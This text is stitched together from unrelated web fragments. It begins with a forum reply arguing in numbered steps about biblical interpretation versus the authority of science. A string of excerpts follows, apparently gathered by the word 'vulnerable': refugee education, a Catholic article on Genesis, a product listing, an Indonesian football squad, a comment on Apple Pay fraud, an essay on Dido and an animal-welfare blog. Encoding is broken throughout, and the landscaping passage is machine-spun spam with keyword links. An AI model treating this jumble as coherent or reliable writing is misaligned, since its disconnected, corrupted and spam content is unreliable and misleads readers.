(E4) Now if my interpretation of an infallible and inerrant message fails to square with what we already know from some other authority that we trust, does it make sense for me to take for granted that my own interpretation is not to blame? Is it most faithful to what I already believe to instead mistrust science? Would we really trust in our own abilities as individual persons knowing we are prone to unpredictable and extensive error in our human interpretation, refusing to even consider favoring another authority we already have good reason to trust, an authority we already consider so trustworthy that in principle it can never be set âagainstâ Godâs authority, such as â¦ say â¦ science? I am arguing the more humble (and consistent) thing to do would be call into question oneâs own fallible, imperfect, limited, and bias interpretation ability as applied in this case.
(E5) I have constructed a rough-draft of an argument in attempts to analyze the components involved in thinking this way, and give you the opportunity to be very specific if you want to challenge any step of the argument:
(E6.1) Messages using human words require interpretation to be understood properly
(E6.2) The Bible is a message from God using human words
(E6.3) Therefore, the Bible requires interpretation to be understood properly
(E6.4) Human interpretation of messages communicated with human language has no protection from endless erring
(E6.5) The Bible requires human interpretation of messages communicated with human language to be understood properly
(E6.6) Therefore, nothing protects humans from endless erring in biblical interpretation
(E6.7) Human interpretation cannot be trusted in principle
(E6.8) Science can be trusted in principle
(E6.9) Therefore, science can be trusted more than the human interpretation of Scripture
(E6.10) Human interpretation of passage X in the Bible contradicts science
(E6.11) Science should be trusted in principle, but human interpretation should not
(E6.12) Therefore, human interpretation of passage X is in err
(E7) Now Paul, if you believe (1) through (11) above, I canât see why you ended up stuck with a war between God and science? If you do not agree with (1) through (11), please point out where it goes wrongâand donât forget to distinguish between whether you think my conclusions are not following from the premises or whether the premises themselves are unsound, referring to them specifically using the numbers assigned above.
(F1) I have also made a rough draft (you can help make it better) of an element of your argument, as best I understand it, below in parallel fashion:
(F2.1a) The Bible is more inspired, inerrant, and authoritative than even science,
(F3.1b) or transcends the authority of science
(F3.2) Human interpretation of passage X in the Bible contradicts science
(F3.3) Therefore, with respect to passage X in the Bible, one must choose between Godâs authority and that of science
(F3.4) Bradley chooses science over human interpretation of passage X
(F3.5) Passage X has divine authority
(F3.6) Therefore, Bradleyâs action betrays Godâs authority
(F4) There are really unspoken premises needed to complete this argument in order for (6) to be a valid conclusion. You would have to establish, it seems to me, that the ultimacy of authority assigned to Scripture had some ability to make human interpretation more reliable in interpreting it. Or better yet - that when I chose science over human interpretation, I am really choosing human authority over Godâs authority. Then I could see how I might be accused by you of failing to give ultimacy of authority itâs proper place in a divine-human hierarchy.
(F5) I donât want to address your example of Genesis, since you and I clearly have a vastly different appreciation for the science of hermeneutics, and the role of science in the art of interpretationâespecially where the knowledge of the use of ancient languages, literary influences, known writing genres and their corresponding language practices, and historical and socio-political contexts becomes necessary for a responsible interpretation. Although your arguments sometimes seem to require beliefs about hermeneutics that I do not think are most advantageous to interpretive accuracy, it would seem this would entangle us in the question of interpretation instead of authority. But I donât want to have that discussion because itâs not necessary at this point. Nevertheless â¦
(G1) I will grant you your wish.
(G2) I will answer your question, in spite of what appears to be a confused expression on your part about what you really mean, since you deny that you are forcing me to choose between the authority of science and the authority of God because you trust scienceâs authority in such a way that such a dilemma should not occur. And yet, Iâll answer your question anyway. For the sake of clarity, however, I want to place your question as close to my answer as possible so you see another irony:
Now the question I am asking you is, do you take as authoritative what science tells us, or what scripture tells us? That is a pretty simple question and I would think it would be able to be answered in a fairly simple way. Yes or no would probably suffice. The reasons as to why you answer yes or no would require much further discussion I would suppose, but at least we would then have a starting point.
(G4) Was that direct enough? Iâve answered your question. The one I was supposedly avoidingâthought I faced it head on. Not only this, but I have even accommodated myself for your convenience to answer your question in the exact fashion you suggested: with a âyesâ or a âno.â My guess, however, is that you will still have some sort of hermeneutic of suspicion to apply to all this still, even when Iâm bending over backwards to do as you ask, not only in answering your question directly, but using the limited choice of words you suggested for such a âsimpleâ question. I have not only met your challenge, but I have done so in a manner I allowed you to chose, and after you have had the privilege of re-wording your question in attempts to clear up any doubts about its meaning. Are you happy about that?
(G5) Can you stop accusing me of not answering your question? I would appreciate it.
(H1) Now, irony of ironies. Although I am the one who was put on the stand and judged harshly by you as misrepresenting the word choice found in your expressions, it is actually you who are guilty of this. Below do not understand my argument to be that asking OE1 entails an dubious assumption in such a way that answering it with a âyesâ or ânoâ would entail taking on that assumption. That is my position, but below you will see that you have recklessly misconstrued my position without even offering any reasons for why the wording in my expressions would require the meaning you are assigning to it, much less did you offer sufficient reasons for the same.
It seems obvious to me that to you, to question where our ultimate authority lies, means that I must disregard what science has to say altogether!
(H2) Here you claim not only that I have argued asking OE1 entails disregarding any truth claims reached on the basis of sciencesâ authority, but that such a rendering of my position âseems obviousâ (to you anyways). But after investigating again the words I used in expressing my position, I have failed to find any place in my reply where I make this argument or imply it logically. If you are going to advance this kind of careless interpretation, you need to quote me. Where do claim this? I am eager to discover in which place you see me making this argument. It is a stew man if I ever saw one.
(H3) Now in my discourse with you, I assumed at the outset the inevitability that both of us ought to be humble enough to consider the possibility that defects exist in our communication and that we will at times choose words that in retrospect have to be clarified when their intended meaning fails to get through to the intended reader. Therefore, I open my own reply as follows:
I may not be articulating this perfectly, so I am willing to clarify or restate anything I said if I have not chosen the right way to say it, butâ¦
(H4) In contrast to this, you not only blame me for the shortcoming of your own communication, but you go on to misrepresent my positionâthe very thing you seemed so indignant about when you perceived me to be the one guilty of doing this to you. This makes you guilty here of a kind of hypocrisy, being the aggressor who challenged me with a barrage of questions under suspicion of my impiety in the thread of my post. When I did not answer your question because I argued that doing so would entail sharing the assumption inherent in the words of itâs expression, you not only openly judged my motives and character, you then falsely accused me of being the one misrepresenting arguments when upon scrutiny it was you who were guilty of this. Understanding the intended meaning and analyzing the logic of the meaning of someone who decides to explain why she differs in opinion from yourself requires sufficient mental energy and attention in and of itself. I donât see need to spend extra time and energy speculating about unspoken motives in the heart of the person who disagrees with you. After all, isnât there supposed to be only one who can see the heart?
(H5) It is a difficult enough task judging the secret, unspoken motives behind the words of persons you love most, persons you are close to you and see every day. With such loved persons you will have the deepest level of familiarity with the way they use language, how to place things they say in the larger context of what things you know about them and their character; you will become accustomed to their mannerisms and quirks. Yet, it is often difficult even with this we love most and care for most, to read properly the secret motives behind their words and actions. Much less, therefore, is it appropriate or wise for you to judge me so extensively, thinking of your hunches about my motives and character as somehow clever in spotting something âbadâ in me, slandering me as purposefully avoiding your question because of my hidden motives.
(H6) The fact that you would fail to think the best of me (whatever that would mean for you) is violation enough, but to make it part of the structure of your argument or message to me (being all too quick to judge) certainly appears to say more about you than it does about me. It is appropriate to the form of love to assume the best of others until they give you good reason not to assume the best of them. This is especially needed when you donât see eye to eye with someone else, because everyone knows we be vulnerable to demonizing others with whom we find ourselves in sharp disagreement. I have no control over your imaginative suspicions of me as your interlocutor; I canât help it if in your imagination you are unable to conceive of my motives as being being good, even if you think my arguments are flawed. Itâs neither fair to me nor appropriate to the form of love and respectable, civil engagement in a forum such as this.
(H7) I want to make one last argument in as a draw to a close. You used a certain kind of logic in your argument below that I want to borrow for my own argument:
(H7.1) If the Scriptures are not divinely inspired
(H7.2) then they are certainly not inerrant,
(H7.3) and if they are not inerrant,
(H7.4) then they certainly cannot be trusted,
(H7.5) if they cannot be trusted
(H7.6) they would certainly have no authority in what they say or teach.
(H8) Below I have construed two arguments that appears to make the logic of own position problematic.
(H8.1) If science is not divinely inspired
(H8.2) then science is certainly not inerrant,
(H8.3) and if science is not inerrant,
(H8.4) then science certainly cannot be trusted,
(H8.5) if science cannot be trusted
(H8.6) science would certainly have no authority in what it says or teaches
(H9.1) If human interpretation is not divinely inspired
(H9.2) then human interpretation is certainly not inerrant,
(H9.3) and if human interpretation is not inerrant,
(H9.4) then human interpretation certainly cannot be trusted,
(H9.5) if human interpretation cannot be trusted
(H9.6) human interpretation would certainly have no authority in what it says or teaches
(H9.7) what we understand as âGodâs Wordâ depends on a correct interpretation of Godâs Word
(H9.8) therefore, the method we use to construe what is âGodâs Wordâ cannot be trusted
(H9.9) if âGodâs Wordâ can be trusted in theory, but in practice amounts to human interpretation of it
(H9.10) then anything concrete we intend to mean when we say âGodâs Wordâ will amount to a particular human interpretation
(H9.11) therefore, practically speaking, âGodâs Wordâ cannot be trusted and has no authority in what it says or teaches
(H10) If your own position is not problematic in this way, I have provided the numbering system for you to specify which parts of it to find fault. Be sure distinguish between soundness and validity of argument so it will be clear in what way you plan to make uncertain itâs conclusionâthat is, by arguing my conclusion does not follow from the premises, or by arguing that one or more of the premises is unsound.
(H11) If I have mistakenly chosen words that are ambiguous I will be glad to restate my meaning and clarify. Making logical blunders is not beyond me, but youâll need to take advantage of my numbering system above to make a case. The lengths I have gone to in using them are intended for easy reference, which makes communication more efficient and makes it easier for you spot the exact error in my thinking and refer to it shorthand. If my arguments hold, your position is shockingly vulnerable again in a self-referentially absurd way. If nothing human interpretation or science says can be trusted based on your own logic, we have indeed arrived at an unintended absurdity as the byproduct of a misstep somewhere.
(H12) Why do you trust human interpretation? Why do you trust science and assign to it authority? This brings me to my last point.
â¦I can assure you that I donât think it is self referentially absurd.
(I) Iâm not sure why you would respond to me as though I were misperceiving you in this way. Usually the people who believe an argument is self referentially absurd are not the oneâs that are themselves also seeking to advance the absurd argument; as though you actually thought the argument that you were yourself advancing, was at the same time perceived by you to be self referentially absurd. And Iâm not really interested in discussing so much which positions we find persuasive personally vs. which oneâs we find unpersuasive, but rather on focusing attention on the logical consequences of adapting one view vs. another, and the demand for the totality of our adopted positions to be coherent once properly understood. When one person claims that another person has misunderstood their words, they get the chance to then clarify what their true position actually is on a matter. This is almost always progress.
(I1) Unless of course, the person is confused about what position he or she actually holds, or has difficulty in choosing his or her words carefully enough to be sufficiently understood by those they accost with accusations, for whom the words are intended. We can neither hold to claims that themselves are problematic when there appear to be good reasons to believe the one claim is internally incompatible with another we also hold, so that without further tweaking or clarification, they do not appear rationally coherent together.
And now I await your thoughts, and hope for a more gracious interaction from you.
|When Elmo And Big Bird Talk To Refugees||Elmo and Big Bird have lots of experience teaching children everything from the ABCs to autism. Soon, they could be bringing smiles â and education â to millions of refugee children forced from their homes in Syria, Iraq and other war-torn countries. But first, Sesame Workshop is doing its homework. In partnership with the International Rescue Committee, Sesame producers and early-childhood experts are soliciting guidance and feedback from relief organizations, trauma experts, academics and others who have worked with refugees. They'll also be making research visits to refugee camps in Jordan. According to the IRC, of the 65 million people displaced from their homes worldwide, more than half are children. "And certainly I think it's fair to say there are no more vulnerable people in the world than these refugee families and kids," Jeff Dunn, the CEO of Sesame Workshop, told a small crowd at the nonprofit company's New York headquarters recently. Sesame's goal is to develop new content |
|The Rising Tide of Renters â A Vulnerable Population||Author: Gary Scronce, Director of Preparedness Programs, IEM This article was originally published in the IAEM Bulletin, Vol. 34, No. 6 June 2017. Iâm sure most people do not think of renters as an especially vulnerable population, from an emergency management or any other perspective. However, south Louisianaâs (particularly the New Orleans areaâs) recovery […]|
|Genesis account of creation and fall: what does the Church teach?||John Young|
The book of Genesis gives a vivid picture of creation. God is like a workman, constructing the universe over a period of six days, then resting on the Sabbath. There is a beautiful garden, trees with strange properties, the first two human beings, an evil serpent, an angel to guard the entrance after the couple have been cast out as punishment for eating forbidden fruit.
Clearly there is a wealth of symbolism in the account but there is also true history. The Pontifical Biblical Commission, in 1909, declared that the first three chapters of Genesis contain true history, basing this answer on the testimony of both the Old and New Testaments, the almost unanimous opinion of the Fathers of the Church, and "the traditional view which - transmitted also by the Jewish people - has always been held by the Church" that these chapters contain the narrative of things that actually happened (see AAS, 1909, 567-569).
Two extremes need to be avoided in biblical interpretation, whether in Genesis or elsewhere: taking things too literally or not taking them literally enough. Those who do the former are labelled fundamentalists, but we should recognise that they want to be faithful to the fundamentals of Christianity, whereas those who too easily dismiss the literal sense of a passage will often deny key doctrines - for instance, some even see the Resurrection of Christ as not involving the body that was buried in the tomb.
In conversation with a Baptist student for the ministry, I once interpreted a Bible passage in a non-literal sense, and he suggested that if we do that with this particular text, we will not know where to stop. I can sympathise with his difficulty, for he didn't accept a Church that can guide us infallibly. But given a Magisterium guided by the Holy Spirit, we can stay on the right path.
With that in mind, what things in the Genesis creation accounts must be accepted as having happened, and what is, or may be, only symbolism? First let us look at a number of things in the first category.
Genesis says God created the heavens and the earth. This means that he willed the world to exist and it came into being from nothing. It depended on his infinite will, not on any previously existing matter - for there was none. The Catechism of the Catholic Church (n. 293) quotes the words of Vatican I that God, "from the beginning of time made out of nothing both orders of creation, the spiritual and the corporeal."
That teaching has profound consequences for our spiritual lives because it shows our utter dependence on God. Once things got into existence they didn't become independent of their Creator: each being, including ourselves, depends as utterly on the divine will holding it in existence from moment to moment as creation did in its first instant (see the Catechism of the Catholic Church, n. 301.) A realisation of this lets us see more profoundly the truth of St Paul's words: "What have you that you have not received and if you have received why do you glory as though you had not received?" I Cor 4:7).
It is a fact is that Adam and Eve were real individuals. They are not symbolic figures simply standing for early humanity. Pope Pius XII expressed the constant belief of the Church when he rejected the idea that Adam was not an individual man but only a name given to some group of our ancestors. He declared: "Original sin is the result of sin committed, in actual historical fact, by an individual man named Adam" (Encyclical Humani Generis, n. 37).
It is certain that Satan tempted our first parents to commit the first sin. St John, in the Apocalypse, writes of "that ancient serpent, who is called the Devil and Satan, the deceiver of the whole world" (Rev 12:9). He is the leader of the fallen angels, those purely spiritual beings who rebelled against God and were cast into hell. (For the fallen angels and their tempting of the human race, see the Catechism of the Catholic Church, n. 391ff.)
After Adam and Eve sinned, work became laborious, they suffered and would eventually die. These afflictions flowed from their fall from God's grace. The Catechism recalls: "By the radiance of this grace, all dimensions of man's life were confirmed. As long as he remained in the divine intimacy, man would not have to suffer or die" (n. 376).
But Adam and Eve lost this grace when they sinned. "The harmony in which they had found themselves, thanks to original justice, is now destroyed, the control of the soul's spiritual faculties over the body is shattered" (n. 400).
God had warned our first parents that they would die if they ate the forbidden fruit. We don't know concretely what the sin was (eating fruit from a tree may be mere symbolism), but we do know that physical death was a consequence - people would not have died had Adam and Eve remained faithful to God's command. Vatican II speaks of "bodily death from which man would have been immune had he not sinned" ( Pastoral Constitution on the Church in the Modern World, n. 18).
In a sense death is natural, for the body, from its very nature, is vulnerable to destruction, but God would have given us the preternatural gift of bodily immortality had Adam not sinned. Other preternatural gifts were lost too: we would have had clearer understanding, a stronger will, control over our passions.
Seeing the present state of human nature we may be tempted to think God was unfair to us, for it was Adam, not us, who committed original sin. As the saying goes: Adam ate the apple and we get the stomach ache. But we need to realise that the gifts just mentioned are not owed to human nature since they would have been something over and above the natural.
Most serious of all, sanctifying grace was lost by original sin. It is this grace which, infused into the soul by God, gives us a share in his own divine life. It raises us to a new level of being, making us capable of seeing him face to face in heaven. The essence of original sin in us consists in the privation of that share in the divine life.
Genesis depicts the fall and its consequences in terms of Adam and Eve's attempts to hide from God, their expulsion from the garden, and their struggle to survive in a hostile world.
|Nicholas Sewardâs nudes show strength in female form||
Rather than vulnerability or sexuality, the images evoke the inherent strength and nativity of the womenâs bodies, part of an exhibit showing at Gallery Espresso through the end of June.
A WOMAN crouches in a tree, her pale limbs at once a stark contrast and a compositional complement to the gnarled branches. In another image, a statuesque redhead kneels near a garage, the rust of the door playing on the hue of her hair.â¦
|(TCPA1BS) Panic Button||
Honeywell evohome security wireless panic button (TCPA1BS) Ideal fro elderly or vulnerable customers who may need to trigger an alarm in case of an emergency. The key fob can be attached to a key chain or belt clip-it can also be worn as a pendant or writband. Water resistant to IP67 One battery CR2032A (in box) Â
The fit and forget solution to frozen condensate pipes. Condensulate Xtreme offers an innovative passive solution to the issue of freezing condensate for condensing boilers. Key benefits: - Easy to install - Includes adaptors - Fully integrated, insulated and flexible pipe - Not vulnerable to UV degradation, vandalism or vermin when sleeved in waste pipe - An innovative cost effective solution - Aesthetically pleasingÂ - No electrical or mechanical parts - Sleeved in 40mm waste pipe Does not freeze at -10Â° Â Kit includes: - 3m Condensulate Extreme - 1 x 21.5mm-20mm reducer - 1 x 21.5mm pipe end - 1 x 32mm-21.5mm reducer - 1 x drain guard
|The Way To Reduce Using Water To Your Landscape|
Learning how to properly landscape your yard is really a skill, allowing you turn your own home in the jewel in the neighborhood. Often times they don't know how to accomplish that, though people want their houses to appear great on their block. This article is a good choice for exactly that. Continue along for some advice on becoming great at landscaping.
When building an outdoors kitchen, look for granite for the surfacing. Though granite is generally much more expensive than marble or another options, it is generally more durable and much easier to keep up.
Use native plants when landscaping your yard. Native varieties require less attention as they are living in an environment that is naturally conducive for their growth. This too means they are low-maintenance. You can get details about plants that happen to be indigenous to your area by looking at your best gardening store.
There's a lot more to landscaping then simply planting some grass and trees. You must also add other natural materials including wood, stone and even iron. Use decks, archways and pergolas to generate attractive looks which can be complex, beautiful and visually interesting. These components come in a number of prices despite your budget.
By making a garden that incorporates all seasons, create your yard look beautiful all year. Seek out shrubs and plants that bloom at various times throughout the year. Also, pick trees which have unique foliage as well as evergreens to make your yard bright all year round.
Many people don't think about online shopping regarding landscaping. You will find a larger selection of plants, including some that are not offered by your nearby stores. You will also save the trouble and gas of actually venturing out over a shopping trip.
By buying them with the right times, save on materials. Buy lumber in the winter months or mulch in late season to save lots of funds. Wait a couple of years with regard to their prices to fall before purchasing them, when new plants are brought to the current market.
Include different types of greenery within your landscaping plans for variety and different beauty. This can be factor to protecting the yard from disease or bacteria. They won't be vulnerable to a similar harmful agents when your plants are varied. Houston landscapers To help keep a landscape healthy, choosing numerous types of species is very important.
It might be difficult to find out what sort of flowers is going to do well under a proven shade tree. Ground cover is a far greater choice. Ground covers are really easy to maintain and definately will add interest to your landscape. Consider hosta or sweet woodruff as ground covers for your trees.
If you're thinking of hiring a pro landscaper to your project, ask for a few references. Price is extremely important, just before hiring any landscaper, make certain to take a look with the past work that she or he did.
When you are assembling your own landscape plan, add a quote to the cost. Create the items you understand you need in writing. Then you definitely should discover the best locations to buy the products to acquire high quality items with a great price. Going to a home remodeling store or even a garden supply area can provide a sense of the costs, because they can vary greatly by season and site. Discover where the top deals are and don't forget to ask around for your lowest prices.
Remember the possible impact that some landscaping could have on certain areas of your dwelling. When you are careless, you will probably find that this roots from the plants could interfere with any underground piping you possess. Before finalizing your landscaping design, always consider these sorts of practical problems.
You've learned a little more about landscaping, so just why not get moving today? You'll enjoy the look of your home's outdoor areas along with the feeling of satisfaction you'll feel from creating your new garden. Coming home right after a long day of labor will certainly be a lot better when you drive as much as your renovated landscape. Houston landscapers The outcome you obtain from landscaping worth the investment of your respective time and expense.
|Daftar Skuad Pra Olimpiade 2011 Timnas Indonesia|
Daftar Lengkap Skuad Pra Olimpiade 2011:
1. Kurnia Mega (Arema Indonesia)
2. Arditani Ardiyasa (Persija Jakarta)
3. Muhamad Ridwan (Persita Tangerang)
4. Abdul Hamid Mony (Persiba Balikpapan)
5. Safri Umi (Persiraja Banda Aceh)
6. Diaz Angga Putra (Persib Bandung)
7. Ahmad Farizi (Arema Indonesia)
8. Gunawan Dwi Cahyo (Sriwijaya FC)
9. Rahmat Latif (Sriwijaya FC)
10. Fachrudin (PSS Sleman)
11. Septia Hadi (PSPS Pekanbaru)
12. Okto Maniani (Sriwijaya FC)
13. Dendi Santoso (Arema Indonesia)
14. Egi Melgiansyah (Pelita Jaya)
15. Hendro Siswanto (Persela Lamongan)
16. Ramdani Lestaluhu (Persija Jakarta)
17. Nasution Karubaba (Perseman Manokwari)
18. Engelberth Sani (Pelita Jaya)
19. Johan Yoga (Persib Bandung)
20. Rishadi Fauzi (Persita Tangerang)
21. Aris Alfiansyah (Persela Lamongan)
22. Titus Bonai (Persipura Jayapura)
23. Risky Novriansyah (Persijap Jepara)
24. David Lali (Persipura Jayapura)
25. Yongki Aribowo (Arema Indonesia)
26. Ruben Wuarbanaran (dalam proses WNI & paspor Indonesia)
SEMOGA INDONESIA MAMPU JUARA DAN MEMBUKTIKAN BAHWA KITA BISA DAN MAMPU MENJADI YANG TERBAIK. GOGOGO GARUDA MUDA
|Comment on Fraud cases across three prefectures involving Apple Pay exploit loophole: Sources by Willam Hugh Murray, CISSP||As best I can tell the issuer is sending a one time password to the phone of record of their customer. They are being duped into changing that number from that of their customer to that of the perpetrators. We have also seen cases in which telcos have been duped into changing the association between a phone number and a SIM or device.
To the extent that we rely upon text to phone for a control, we better be very careful about enrolling and changing those phone numbers. Consumers can help by ensuring that the numbers in their profiles are correct and that they are receiving the traffic intended for them.
Note that postal mail and e-mail may be vulnerable to the same kind of attack.|
|Returning Starters Part II: The Defensive Lines are the key!|
The defensive line is the lynchpin of every defense.
A strong defensive line will force a weaker offense to utilize their tight ends for blocking assignments. A weak defensive line will allow the TE to run his seam routes. When the TE runs free, then the middle linebacker has to chase him, and this opens up the vulnerable heart of the standard 4-3 defensive allignments.
A strong defensive line forces a fullback, or running back to stay in for protection.
A strong defensive line disrupts the rhythm of the quarterback.
A strong defensive line shortens routes.
A strong defensive line limits what a running back can do.
The best part of a GREAT defensive line is that it "protects" its linebackers in much the same way an offensive line protects their QB. When the linebackers run free, then an offense is compromized. The defensive line is the linchpin of any great defense.
THE MOST UNDERRATED ASPECT OF FOOTBALL HANDICAPPING IS DEFENSIVE LINE EVALUATION.
With that being said, let's look at a weak defense:
Arkansas was the worst defense in the SEC. They allowed 42 touchdowns and 4,500 yards. When you compare it to the 14 touchdowns and 3,100 yards allowed by #1 Tennessee the contrast can be stunning. Why was Arkansas so bad?
You can trace it to the defensive line. This unit is highly undersized with Adrian Davis pushing 250 pounds on one end and two tackles in the 280-290 range. There won't be a pressing need for any offensive line to double team on the inside until Petrino's recruits get settled in. Arkansas was outrushed by almost 60 yards per game last season, and the 2009 version of the Hogs looks just as weak as the 2008 unit.
I mentioned a 250 pound strong side defensive end in Arkansas. He's backed up by a "Sam" Linebacker that weighs 237 pounds and an MLB that weighs 222 pounds.
*What are they going to do when LSU runs a 315 pound right tackle and a 233 pound tailback down their throats? Oh, let me see.....last year LSU ran the ball 44 out of 65 times.
*What are they going to do when they face Alabama's 305 pound senior right tackle? Let's see.....Bama only threw the ball 15 times in the 2008 meeting.....They gained an average of 9.4 yards per carry!
I suppose I'll keep this short by saying:
In most cases....when there is a vast inequality between opposing lines, the gameplan will already be in place for you! SEC teams are no different than any other college team. Their coaches will seek the path of least resistance. FIND THE MASSIVE IMBALANCES AND YOUR JOB WILL BE EASIER.
Also remember: Totals can be assessed with this imbalance in mind. Alabama scored 49 points in that meeting with Arkansas, but they recieved the benefit of 2 interception returns for touchdowns and two huge rushing touchdowns (82 and 67 yards). The 49 points is misleading. MASSIVE LINE IMBALANCES WILL INDUCE TIME CONSUMING DRIVES! (The life gets sucked out of team totals for weaker defensive teams: less possessions for their offense, and a fresher opposing defense.)
This is one facet of football handicapping that occurs less frequently in the NFL, but it pops up all over the board on Saturdays. One can certainly argue that the run sets up the pass, and therefore totals can still rise, but in college the trend toward increased passing due to run success can be less influential.
*Even Tulsa ran the ball 47 times against Arkansas in 2008.
I hope this helps (I may try to find games where imbalances are pronounced).
|A conversation with General Pace||Last month, I was thrilled to attend a talk hosted by Peter Pace, former Chairman of the U.S Joint Chiefs of Staff at JP Morgan's headquarters in New York City. During a Q&A session that followed the main talk, he fielded some good questions from investment bankers in the audience. The last question he answered was about which threats to American security kept him up at night. |
His response surprised me.
First he listed things that you would expect, such as the campaigns in Iraq and Afghanistan, political instability in Africa and the Middle East, the rise of China, the craziness of North Korea, the specter of general nuclear proliferation. Then he went back over each of these things and explained why they do not bother him too, too much.
What really bother him, he said, is the threat of cyber attack. The United States is extremely vulnerable to cyber weapons, he said. He mentioned that large firms like JP Morgan no doubt have the resources to protect themselves a bit from these threats. [Word on the street has it that they do this by hiring people straight out of the CIA and NSA]. But that smaller firms have no such protection, and it is in the best interest of everyone for large corporations and the US government work on security gaps together.
|Dido at the Extremes: Vergil's Tragic Heroine as Victim of and Threat to Rome||In the scholarship of Vergilâs The Aeneid, Dido is a bit of a divisive character. Scholars are all over the map in their interpretations of this first queen of Carthage, a woman whose intimate relationship with the Trojan hero Aeneas delays, for a full year, his journey to Italy and the inevitable founding of Rome. Some understand Dido as a Vergilian Cleopatra, a vagina dÃ©tente of sorts that must be fought off in order for Aeneas to successfully fulfill his destiny. Others see her as a representation of Epicureanism, a mode of thought that Aeneas has to reject in favor of the popular Roman ideology of Stoicism. Still others perceive Dido as a tragic figure, a woman who falls deeply in love with a man who genuinely loves her in return and pursues a relationship with him despite both of their knowledge that he is destined for another fate. I argue that Dido is a victim caught in the crossfire of two goddesses: Juno, who has it out for Aeneas and would like for the queen to refuse him help when he lands on the shores of Carthage, and Venus, Aeneasâs mother, who ensures that Dido will aid in Aeneasâs mission by causing her to fall for the Trojan hero. In the end, Dido is collateral damage, sadlyâbut necessarilyâdestroyed in order to ensure the success of Aeneasâs imperialistic charge.|
There are lots of ways that Vergil demonstrates his sympathy for Didoâs plight and thus paints her as a victim. The author portrays Dido as wise and cautious, but also generous and fair, in her initial dealings with Aeneas and his men: ââEase your hearts, Trojans, put away your fears. / The threats to my new kingdom here have forced me / To carefully place guards on all the borders. / Who hasnât heard about Aeneasâs family, / Or Troyâthose brave men and the flames of war? / . . . / Iâll send you off secure and well-suppliedâ (17). Vergil also allows us insight into Didoâs heartbroken and humiliated consciousness when Aeneas prepares to leave Carthage a year later, in over 10 pages of the queenâs cursing herself for her foolishness to believe in Aeneasâs love and her shame in abandoning the memory of her first husband before she finally takes her own life. Most of all, Vergil depicts Dido as an ideal potential wifeâat least within the context of first-century Roman culture that valued familial devotion and a patriarchal family structure.
My most persuasive bit of evidence for this claim is that Dido comes to love Aeneas through his child, Ascanius, and is therefore positioned, first and foremost, as a good potential mother. Venus gains access to Didoâs emotions by sending Cupid in the form of Ascanius to a banquet given in Aeneasâs honor soon after he lands in Carthage. Disguised as Aeneasâs son, Cupid crawls into Didoâs lap and easily captures her heart; Dido looks on Ascanius âwith hunger in her heartâ and is âenchantedâ by the little boy (21). As was Venusâs plan all along, âunlucky Didoâ then transfers her love for Ascanius to Aeneas himself (22). Had Venus hired one, a modern-day efficiency consultant would certainly have here pointed out that she could have skipped a whole step if only she had only charged Cupid to take the form of Aeneas instead of Ascanius. Or, she could have just given Aeneas a divine glow, as Athena grants to Odysseus before he meets Nausicaa (a scene that is frequently compared to Aeneasâs initial encounter with Dido, not incidentally). Desperate to protect her own child, though, Venus seems to recognize Didoâs maternal instinct as her biggest vulnerability and plans her course of action accordingly. In this way, of course, Dido is an ideal potential Roman matron, devoted to her would-be child as well as his father.
Besides loving Aeneasâs small son, Dido proves her worth as an ideal Roman wife in other ways. First of all, as any proper wife should, she expresses reluctance to abandon the memory of her dead first husband instead of carelessly entering into a relationship with Aeneas right away; as she considers a future with Aeneas, Dido suffers âan unseen flame [that] gnawed at her hour on hourâ (71). Once Dido gives in to her passion for Aeneas, though, she centers her world on this would-be second husband, even neglecting her professional duties as a queen to act as a wife to Aeneas. Indeed, it seems that Dido desires for Aeneas to serve as a co-ruler of Carthage, to perhaps take over the projects that she formerly headed up, as she presents him with a visible symbol of Punic royalty, âa purple cloak with think gold stripesâ (78) so like her own âpurple robe,â âedged with rich embroideryâ (74). Dido is clearly willing to allow Aeneas a kingship and to take her traditionally female place as second-in-command.
Portraying Dido as a potentially ideal wife who is victimized by the gods and by fate heightens the tragedy of this story, an epic which details the sacrifices and death required for the founding of an Empire and, indeed, seems in parts to question the overall worth of this venture. In this way, all of the various scholarly perceptions of Dido carry some validity. She is both a tragic figure and representative of a sort of Epicureanism, a self-indulgence unbecoming of and impractical for a man as politically important as Aeneas. And, in some ways, Dido is also a figure of the castrating bitch type, a stand-in for Cleopatra who perhaps nearly caused the downfall of Rome. Although Vergil characterizes Dido as a potentially loving and devoted mother and wife, she is also a sexually attractive and aggressive woman, and, as such, she is also a potential trap, a danger to Aeneas and, by extension, to Rome. Indeed, Aeneas must pry open the vagina dÃ©tente and abandon Didoâs hold on his heart in order to reach his full potential as a true man of Rome.
Vergil. The Aeneid. Trans. Sarah Ruden. New Haven: Yale UP, 2008.
|Encryption Chip Fights Off Side-Channel Attacks||Taiwanese hardware designers say that the cloud based services are vulnerable to data leakage threat due to side-channel attacks. The side-channel attacks steal cryptographic keys used by cloud servers leaving the servers under great threat. Researchers at Taiwanese National Chiao Tung University (NCTU) have developed a chip that resists side-channel attacks. According to Chen-Yi Lee, […]|
|And The Fight Goes On...||In my post yesterday, I forgot to thank everyone who has been coming to this blog regardless of the absence of posts in recent months and also those who continue to fight the good fight against cruelty to animals every single day. It never fails to amaze me how humans can simply disregard their lives as unimportant. It also never fails to amaze me how people hide behind anonymity to promote the virtues of the abuse and slaughter of animals. You'd think that they would put their name to their convictions but a comment on an old post on here, Slaughter of Dogs in Serbia, seems to dictate otherwise.|
The comment is as follows and has been published to the post:
People are suffering more than dogs all over the world, but that doesn't concern you. It makes me sick how you people care so much about dogs, while people and children are starving. All that you just said is a bullshit. There are so many dogs on the streets of serbia, that it is unbearable. People are feeding them and sitting in cafes along with dogs. Serbia is destroyed by war and can't afford shelters for stray dogs, so what else can they do than kill them. Who needs that many dogs anyway.It is disgusting to see that many dirty stray dogs everywhere you go and stepping in their shit all the time. They are mating on the streets in pacs in a middle of a day, getting mad and dangerous to people and children. Dogs, actually , took over the streets of cities. I really don't care if they are all killed today, if you do, take them home with you and ask your government to take care of them.
First of all, I would like to point out that I fully understand that people suffer every single day from illness, abuse, abandonment and neglect. There are plenty of causes out there that I support in aid of the vulnerable and ill. However, the title of this blog should give the writer of this post an idea of what cause I am supporting here - giving a voice to a creature that often suffers at the hands of humans through no fault of its own. I choose to promote the plight of greyhounds so, no offence intended, if you do not like it then please read another blog.
Everyone is entitled to their own opinion and to throw their weight into the debate as they see fit. However, this comment is a prime example of the ignorance and complete disregard that has led to these problems in the first place. If the governments of countries have let the "problem" get out of hand then that still does not give them the right to relentlessly slaughter dogs. There has to be better solutions than that and I refuse to believe that there are not.
